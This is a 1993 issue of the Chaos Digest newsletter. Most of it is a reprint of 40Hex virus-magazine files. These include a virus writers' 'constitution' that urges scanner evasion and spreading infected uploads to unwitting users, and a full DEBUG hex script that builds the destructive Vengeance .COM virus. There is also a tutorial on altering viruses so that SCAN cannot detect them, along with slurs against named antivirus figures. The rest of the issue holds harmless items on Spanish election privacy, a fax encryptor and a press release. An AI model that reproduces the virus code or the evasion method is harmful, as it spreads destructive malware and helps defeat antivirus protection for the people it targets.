Chaos Digest             Tuesday 8 June 1993            Volume 1 : Number 47
                                                               ISSN 1244-4901

       Editor: Jean-Bernard Condat (jbcondat@attmail.com)
       Archivist: Yves-Marie Crabbe
       Co-Editors: Arnaud Bigare, Stephane Briere

TABLE OF CONTENTS, #1.47 (8 June 1993)
File 1--40H VMag Number 5 Volume 2 Issue 1 #005-007 (reprint)
File 2--Spanish elections and data freedoms (news)
File 3--SurFax, fax security unit (product)
File 4--_Computer Virus Awareness Day_ briefing (press release)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:

                linux-activists-request@niksula.hut.fi

with a mail header or first line containing the following information:

                X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893.

Back issues of ChaosD can be found on the Internet as part of the Computer
underground Digest archives. They're accessible using anonymous FTP:

        * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
        * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
        * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
        * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
        * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
        * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
        * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
        * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited. Some
authors do copyright their material, and they should be contacted for reprint
permission.
Readers are encouraged to submit reasoned articles in French, English or
German languages relating to computer culture and telecommunications.
Articles are preferred to short responses. Please avoid quoting previous
posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Chaos Digest contributors assume all responsibility
for ensuring that articles submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 5 Volume 2 Issue 1 #005-007 (reprint)


                    40Hex Number 5 Volume 2 Issue 1 File 005

             ___________________________________________
             The Constitution of Worldwide Virus Writers
             ___________________________________________
                  Initial Release - February 12, 1992
             ___________________________________________

We, the members of PHALCON/SKISM, in order to form a more perfect
environment worldwide for the virus community, establish justice, ensure
intracommunity tranquility, provide for the common defense and offense,
promote the general welfare, and secure the blessings of liberty to ourselves
and our posterity, do ordain and establish this Constitution of Worldwide
Virus Writers.

ARTICLE I - REGARDING ORIGINAL VIRII

Section A - DEFINITION

The term "original virus" herein indicates programming done exclusively by
either one individual or group, with no code taken from any other source, be
it a book or another virus.

Section B - CODE REQUIREMENTS

For an original virus to conform to the standards set by this document, it
must include the following:

1) The title of the virus in square brackets followed by a zero byte should
   be in the code, in a form suitable for inclusion into SCAN(1). This is to
   ensure that the name of the virus is known to those examining it.
2) The name of the author and his/her group affiliation(s) should be included
   in the code, followed by a zero byte. At the present, this is an optional
   requirement.
3) Some form of encryption or other form of stealth techniques must be used.
   Even a simple XOR routine will suffice.
4) If the virus infects files, the code should be able to handle infection of
   read only files.
5) It must have some feature to distinguish it from other virii. Creativity
   is encouraged above all else.
6) The virus must not be detectable by SCAN.

Section C - IMPLEMENTATION

This section, and all sections hereafter bearing the heading
"IMPLEMENTATION" refer to the recommended method of implementation of the
suggestions/requirements listed in the current article.

1) Virus_Name db '[Avocado]',0
2) Author     db 'Dark Angel, PHALCON/SKISM',0

ARTICLE II - REGARDING "HACKED" VIRII

Section A - DEFINITION

The term "hacked virus" herein refers to any virus written by either one
individual or a group which includes code taken from any other source, be it
a book, a code fragment, or the entire source code from another virus. The
term "source virus" herein refers to the virus which spawned the "hacked
virus."

Section B - CODE REQUIREMENTS

For a "hacked" virus to conform to the standards set forth by this document,
it must include the following, in addition to all the requirements set down
in Article I of this document:

1) The title, author (if available), and affiliation of the author (if
   available) of the original virus.
2) The author of the hacked virus must give the source code of said virus to
   the author of the source virus upon demand.
3) No more Jerusalem, Burger, Vienna, Stoned, and Dark Avenger hacks are to
   be written.
4) The source virus must be improved in some manner (generally in efficiency
   of speed or size).
5) The hacked virus must significantly differ from the source virus, i.e. it
   cannot be simply a text change.
Section C - IMPLEMENTATION

1) Credit db 'Source stolen from Avocado by Dark Angel of PHALCON/SKISM',0

ARTICLE III - REGARDING VIRAL STRAINS

Section A - DEFINITION

The term "viral strain" herein refers to any virus written by the original
author which does not significantly differ from the original. It generally
implies a shrinking in code size, although this is not required.

Section B - CODE REQUIREMENTS

For a "viral strain" to conform to the standards set by this document, it
must include the following, in addition to all the requirements set down in
Article I of this document:

1) The name of the virus shall be denoted by the name of the original virus
   followed by a dash and the version letter.
2) The name of the virus must not change from that of the original strain.
3) A maximum of two strains of the virus can be written.

Section C - IMPLEMENTATION

1) Virus_Name db '[Avocado-B]',0

ARTICLE IV - DISTRIBUTION

Section A - DEFINITION

The term "distribution" herein refers to the transport of the virus through
an infected file to the medium of storage of a third (unwitting) party.

Section B - INFECTION MEDIUM

The distributor shall infect a file with the virus before uploading.
Suggested files include:

1) Newly released utility programs.
2) "Hacked" versions of popular anti-viral software, i.e. the version number
   should be changed, but little else.
3) Beta versions of any program.

The infected file, which must actually do something useful, will then be
uploaded to a board. The following boards are fair game:

1) PD Boards
2) Lamer boards
3) Boards where the sysop is a dick

No virus shall ever be uploaded, especially by the author, directly to an
antivirus board, such as HomeBase or Excalibur.

Section C - BINARY AND SOURCE CODE AVAILABILITY

The binary of the virus shall not be made available until at least two weeks
after the initial (illicit) distribution of the virus.
Further, the source code, which need not be made available, cannot be
released until the latest version of SCAN detects the virus. The source
code, should it be made available, should be written in English.

Section D - DOCUMENTATION

Documentation can be included with the archive containing the binary of the
virus, although this is optional. The author should include information
about the virus suitable for inclusion in the header of VSUM(2). A simple
description will follow, though the author need not reveal any "hidden
features" of the virus. Note this serves two purposes:

1) Enable others to effectively spread the virus without fear of
   self-infection.
2) Ensure that your virus gets a proper listing in VSUM.

ARTICLE V - AMENDMENTS

Section A - PROCEDURE

To propose an amendment, you must first contact a PHALCON/SKISM member
through one of our member boards. Leave a message to one of us explaining
the proposed change. It will then be considered for inclusion. A new copy of
the Constitution will then be drafted and placed on member boards under the
filename "PS-CONST.TXT" available for free download by all virus writers.
Additionally, an updated version of the constitution will be published
periodically in 40HEX.

Section B - AMENDMENTS

None as of this writing.

ARTICLE VI - MISCELLANEOUS

Section A - WHO YOU CAN MAKE FUN OF

This is a list of people who, over the past few years, have proved
themselves to be inept and open to ridicule.

1) Ross M. Greenberg, author of FluShot+
2) Patricia (What's VSUM?) Hoffman.
3) People who post "I am infected by Jerusalem, what do I do?" or "I have 20
   virii, let's trade!"
4) People who don't know the difference between a virus and a trojan.
5) Lamers and "microwares puppies"

Section B - WHO YOU SHOULDN'T DIS TOO BADLY

This is a list of people who, over the past few years, have proved
themselves to be somewhat less inept and open to ridicule than most.
1) John McAfee, nonauthor of SCAN
2) Dennis, true author of SCAN

Section C - MOTIVATION

In most cases, the motivation for writing a virus should not be the pleasure
of seeing someone else's system trashed, but to test one's programming
abilities.

__________
1 SCAN is a registered trademark of McAfee Associates.
2 VSUM is a registered trademark of that bitch who doesn't know her own name.

+++++

                    40Hex Number 5 Volume 2 Issue 1 File 006

----------------------------------------------------------------------------

PHALCON/SKISM Vengeance virus.
Released 02/03/92 in 40Hex Vmag

Stats:  Non-Resident .COM infector.
        Infects files larger than 1992 bytes
        Size of the virus is about 722 bytes

Note: This Virus is dedicated to the memory of Digital Warfare BBS, which was
online up until January 20th, 1992. On that fateful day, the BBS computer
was confiscated by local authorities. Hopefully the board will come back up,
and be as good as before...

This virus activates the 20th of every month. Just for the fun of it, I'm
not going to tell you what this thing does upon activation. I will say one
thing: unless you have suicidal tendencies, DON'T test it on your own
machine, OR the machine of someone you love. It ain't pretty. It IS
destructive. (286+) It IS noisy. And it IS named appropriately.

Text that can be found in the virus:

        *** Vengeance is ours! *** PHALCON/SKISM '92

As of Scan 86, this virus isn't found. Since it is based on the Violator
virus, other scanners may find it. Oh well. Have fun with this one, just
don't run it on the 20th... at least, not on YOUR machine!
%%%% DecimatoR /PHALCON/SKISM %%%% --------------------------------------------------------------------------- n veng.com e 0100 EB 0F 90 90 90 90 90 90 90 90 90 90 90 90 90 90 e 0110 90 51 BA 27 03 FC 8B F2 83 C6 3D BF 00 01 B9 03 e 0120 00 F3 A4 8B F2 B8 0F FF CD 21 3D 01 01 75 03 E9 e 0130 E3 01 06 B4 2F CD 21 89 5C 33 90 8C 44 35 07 BA e 0140 92 00 90 03 D6 B4 1A CD 21 90 06 56 8E 06 2C 00 e 0150 BF 00 00 5E 56 83 C6 43 AC B9 00 80 F2 AE B9 04 e 0160 00 AC AE 75 EE E2 FA 5E 07 89 7C 4E 8B FE 83 C7 e 0170 52 8B DE 83 C6 52 8B FE EB 3D 83 7C 4E 00 75 03 e 0180 E9 3F 01 1E 56 26 8E 1E 2C 00 90 8B FE 90 26 8B e 0190 75 4E 90 83 C7 52 90 90 AC 90 3C 3B 90 74 0B 90 e 01A0 3C 00 74 03 AA EB F0 BE 00 00 5B 1F 89 77 4E 80 e 01B0 FD 5C 74 03 B0 5C AA 89 7F 50 8B F3 83 C6 48 B9 e 01C0 06 00 F3 A4 8B F3 B4 4E BA 52 00 03 D6 B9 03 00 e 01D0 CD 21 EB 04 B4 4F CD 21 73 02 EB 9E 8B 84 A8 00 e 01E0 24 1C 3C 1C 74 EE 81 BC AC 00 2D F7 77 E6 81 BC e 01F0 AC 00 C8 07 72 DE 8B 7C 50 56 81 C6 B0 00 AC AA e 0200 3C 00 75 FA 5E B8 00 43 BA 52 00 03 D6 CD 21 89 e 0210 4C 3B B8 01 43 83 E1 FE BA 52 00 03 D6 CD 21 B8 e 0220 02 3D BA 52 00 03 D6 CD 21 73 03 E9 87 00 8B D8 e 0230 B8 00 57 CD 21 89 4C 37 89 54 39 B4 2C CD 21 B4 e 0240 3F B9 03 00 BA 3D 00 03 D6 CD 21 72 53 3D 03 00 e 0250 75 4E B8 02 42 B9 00 00 BA 00 00 CD 21 72 41 8B e 0260 C8 2D 03 00 89 44 41 81 C1 16 03 8B FE 81 EF 14 e 0270 02 89 0D B4 40 B9 D3 02 8B D6 81 EA 16 02 CD 21 e 0280 72 1E 3D D3 02 75 19 B8 00 42 B9 00 00 BA 00 00 e 0290 CD 21 72 0C B4 40 B9 03 00 8B D6 83 C2 40 CD 21 e 02A0 8B 54 39 8B 4C 37 83 E1 E0 83 C9 1C B8 01 57 CD e 02B0 21 B4 3E CD 21 B8 01 43 8B 4C 3B BA 52 00 03 D6 e 02C0 CD 21 1E B4 1A 8B 54 33 8E 5C 35 CD 21 1F B4 2A e 02D0 CD 21 80 FA 14 75 3E B4 09 8B D6 83 C2 00 CD 21 e 02E0 BA 80 00 32 ED B4 05 CD 13 80 FE 01 74 04 FE C6 e 02F0 EB F3 80 FD 20 74 06 32 F6 FE C5 EB E8 80 FA 81 e 0300 74 06 B2 81 32 F6 EB DB B8 09 25 CD 21 B4 02 B2 e 0310 07 CD 21 EB F8 59 33 C0 33 DB 33 D2 33 F6 BF 00 e 0320 
01 57 33 FF C2 FF FF 0D 0A 2A 2A 2A 20 56 65 6E e 0330 67 65 61 6E 63 65 20 69 73 20 6F 75 72 73 21 20 e 0340 2A 2A 2A 0D 0A 24 20 53 4B 49 53 4D 2F 50 68 61 e 0350 6C 63 6F 6E 20 27 39 32 20 24 00 00 00 00 00 00 e 0360 00 00 00 00 CD 20 90 E9 00 00 50 41 54 48 3D 2A e 0370 2E 43 4F 4D 00 00 00 00 00 00 00 00 00 00 00 00 e 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 03E0 00 00 00 00 rcx 03E3 w q +++++ 40Hex Number 5 Volume 2 Issue 1 File 007 HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT PART II In Issue 1 of 40Hex, Hellraiser presented a simple (though incredibly tedious) method of searching for scan strings. In short, this was his method: 1) Make a small carrier file. 2) Infect the carrier with the virus. 3) Fill parts of the virus with a dummy value until you isolate the scan string. 4) Modify the virus so it is not detectable, i.e. switch the order of the instructions. The problem is, of course, that step 3 takes a maddeningly inordinate amount of time. I shall present a tip which will save you much time. The trick is, of course, to find out where the encryption mechanism and hence the unencrypted portion where the scan string is usually located. Once the encryption mechanism is located, isolating the scan string is much simpler. Of course, the problem is finding the encryption mechanism in the first place. The simplest method of doing this is using V Communication's Sourcer 486, or any similar dissassembler. Dissassemble the file and search for the unencrypted portions. Most of the file will be DBs, so search for any part which isn't. Once you have located those parts, all you have to do is subtract 100h from the memory location to find its physical offset in the file. 
You now have a general idea of where the scan string is located, so perform step 3 until you find it. Ack, you say, what if you don't have Sourcer? Well, all is not lost. Load up the infected carrier in good old DEBUG. The first instruction (in COM infections) should be a JMP. Trace (T) into the JMP and you should be thrown into the area around the encryption mechanism. Use the memory offset (relative to the PSP segment) and subtract 100h to find the physical location of the unencrypted portion in the file. Once again, once you have this, perform step 3. Simple, no? Sometimes, SCAN looks for the writing portion of the code, which generally calls INT 21h, function 40h. This is usually, though not always, located somewhere near the encryption mechanism. If it is not near there, all you have to do is trace through the virus until it calls the write file function. Another method of looking for scan codes is to break the infected carrier file into a series of 50 byte overlapping chunks. For example, the first chunk would be from offset 0 to 49, the second from 24 to 74, the third from 49 to 99, etc. Then use SCAN to see which chunk holds the scan code. This is by far the easiest, not to mention quickest, method. One side note on step 1, making the carrier file. Some virii don't infect tiny files. What you must do is create a larger file (duh). Simply assemble the following two lines: int 20h db 98 dup (0) (with all the garbage segment declarations and shit, of course) and you'll have a nice 100 byte carrier which should be sufficient in most cases, with maybe the exception of the Darth Vaders. Enjoy! 
Dark Angel

------------------------------

Date: Mon Jun 7 22:05:44 -0100 1993
From: rfcalvo@guest2.atimdr.es (Rafael Fernandez Calvo )
Subject: File 2--Spanish elections and data freedoms (news)


 CCCCC  LL      II
CC      LL      II      -- N E W S   FROM   S P A I N ---      June 7, 1993
CC      LL      II
 CCCCC  LLLLLL  II      COMMISSION for LIBERTIES and INFORMATICS (*)


PRIVACY AND GENERAL ELECTIONS: TRICKS OF THE TRADE
++++++++++++++++++++++++++++++++++++++++++++++++++

Spain held general parliamentary elections yesterday, June 6th. Regardless
of the outcome (the ruling Socialist Party obtained again a majority of the
seats), one of the parties participating in the event, "Centrist
Unity-Spanish Democratic Party", was expelled from the race on June 1 by the
Electoral Control Committee on the grounds that the party was actually a
sham put up by a group of direct marketing pirates. It is not the first time
it happens but it is the first time corrective actions are taken against
such violations.

Regardless of the fact that this party had no chance whatsoever of winning a
single seat, it showed again one of the problems that has been plaguing
citizens' privacy in Spain since 1977 (first democratic elections after
forty years of dictatorship): the use for commercial purposes of the
magnetic tapes containing the Election Census, provided to the parties by
the Public Administration.

Big parties do not seem to have participated in data smuggling practices but
there is evidence that many of the companies that process the tapes provided
by them are the main source of abuse against the privacy of citizens in
regard to their personal data in Spain, since they duplicate and sell the
tapes. This fact has been frequently denounced by CLI (*). The recently
approved Personal Data Law could help to stop these practices.

* SOME WORDS ABOUT CLI

The --Commission for Liberties and Informatics, CLI-- is an independent and
pluralistic organization that was officially constituted in April'91.
Its mission is to "promote the development and protection of citizens'
rights, especially privacy, against misuse of Information Technologies".

As of May '93, CLI is composed of nine organizations, with a joint membership
of about 3,000,000 people. They cover a very wide spectrum of social interest
groups: associations of computer professionals, judges, civil rights leagues,
trade unions, consumers groups, direct marketing industry, etc.

CLI is confederated with similar bodies created in some other Spanish Regions
such as Valencia, Basque Country and Catalonia, and has fluid working
relationships with many public and private Data Protection bodies and
entities all over the world, including CNIL, CPSR and Privacy International.

CLI has its headquarters in:

        Padilla 66, 3 dcha.
        E-28006 Madrid, Spain
        Phone: (34-1) 402 9391
        Fax: (34-1) 309 3685
        E-mail: rfcalvo@guest2.atimdr.es

------------------------------

Date: Tue Jun 8 06:06:17 EDT 1993
From: celma_s@epita.fr (Samuel Celma )
Subject: File 3--SurFax, fax security unit (product)


                                 SURFAX
        High Security Encryption System for Facsimile Communication

* Connected between any GIII facsimile equipment and the telephone line;
* Uses a high performance crypto algorithm (2^59 = about 10^18 possible
  cipher keys);
* Designed for finance, commercial and industrial operations;
* Very easy and friendly handling.

SurFax, used on both sides of the PSTN with group 3 fax, provides security
for all the transmitted documents.

Installation
+------------

+-----+    +--------+         +------+         +--------+    +-----+
| Fax |====| Surfax |=====>   | PSTN |   <=====| Surfax |====| Fax |
+-----+    +--------+         +------+         +--------+    +-----+

Simply plug in and add on
No modification required to the fax equipment

Operation
+---------

10-key keyboard
16 digit LCD display
Secret key handling with keyboard
Plain mode / encryption mode selectable with keyboard and hardkey
Dimensions: 16 x 20 x 12 cm
Weight: approx. 1.3 kg
Power: 110/200 VAC, 50/60 Hz

Facsimile Technical Specifications
+----------------------------------

Two facsimile modems
Transmission speed: 9600/7200/4800/2400 bit/s (CCITT V29, V27ter, V21)
Designed to work with Group III facsimile equipment
Fully compatible for transmission to non-crypto fax equipment (T30 protocol)

Security Features
+-----------------

SurFax is a secret-key system.

(1) KEY MANAGEMENT

The system has integrated key management. The user has to enter his 8-digit
secret key on the keyboard. A physical key allows the user to leave SurFax
in the chosen mode (plain or cipher). Otherwise, the secret key can be erased
at any time at the touch of a button, and is automatically erased after each
communication.

A 32-bit session key is generated by a "built-in" random number generator.
Both secret and session keys are combined into a cipher key (2^59 possible
values) on each terminal. The secret and session keys are never transferred
in clear between the two terminals. A new cipher key is created for each
transmitted page.

Closed user groups can be created by request to the manufacturer (by setting
a customer specific parameter).

(2) CIPHER TECHNOLOGY

The K.E.A. (KTT Encryption Algorithm) is KTT proprietary. It is a realtime
data ciphering process and is used to encrypt only the facsimile data. It is
based on a random generator whose initial state depends on a cipher key,
derived from a secret key and a session key (2^59).

More information
+----------------

        Mr David COHEN
        SKTT Henry Kam Technologies & Telecommunications
        2d rue de l'Epine Prolongee
        93541 Bagnolet Cedex
        Phone: +33 1 42 87 54 00
        Fax: +33 1 42 87 23 91

------------------------------

Date: Tue Jun 8 06:06:17 EDT 1993
From: ae446@freenet.carleton.ca (Nigel Allen )
Subject: File 4--_Computer Virus Awareness Day_ briefing (press release)

Press Release from the National Computer Security Association.

Rep. Fields to sponsor Computer Virus Awareness Day briefing; Rep. Markey to
speak to NCSA

To: Assignment Desk, Daybook Editor

Contact: Larry Teien of 3M Data Storage Products, St. Paul, Minn.,
612-736-5961, or Bob Bales of the National Computer Security Association,
Carlisle, Pa., 717-258-1816, or Ken Greenberg of Fleishman-Hillard Inc., Los
Angeles, 213-629-4974

News Advisory:

WHAT:  National Computer Virus Awareness Day Congressional briefing on the
       virus threat and recommended remedial action, sponsored by Rep. Jack
       Fields (R-Texas), ranking Republican on the House Subcommittee on
       Telecommunications and Finance; and an informational exhibit about
       computer virus control and information security.

WHERE: Rayburn House Office Building, Washington, D.C., Room 2257

WHEN:  Wednesday, June 9
       8:30 a.m. to 9:30 a.m. -- Panelist presentations
       9:30 a.m. to 10:30 a.m. -- Media Q&A

WHO:   Co-sponsored by 3M Co. and the National Computer Security Association
       (NCSA). Endorsed by the American Electronics Association, the
       Electronic Industries Association and the Microcomputer Managers
       Association. Panel members to include representatives of NYNEX,
       Rockwell International and the Departments of Justice and Defense, as
       well as 3M and NCSA.

ALSO:  3M/NCSA Congressional dinner, featuring Rep. Edward J. Markey
       (D-Mass.), chairman of the House Subcommittee on Telecommunications
       and Finance. Cotillion Room, Sheraton Washington Hotel, 2660 Woodley
       Road N.W.; 7:45 p.m. on June 10

--
Nigel Allen, Toronto, Ontario, Canada
ae446@freenet.carleton.ca

------------------------------

End of Chaos Digest #1.47
************************************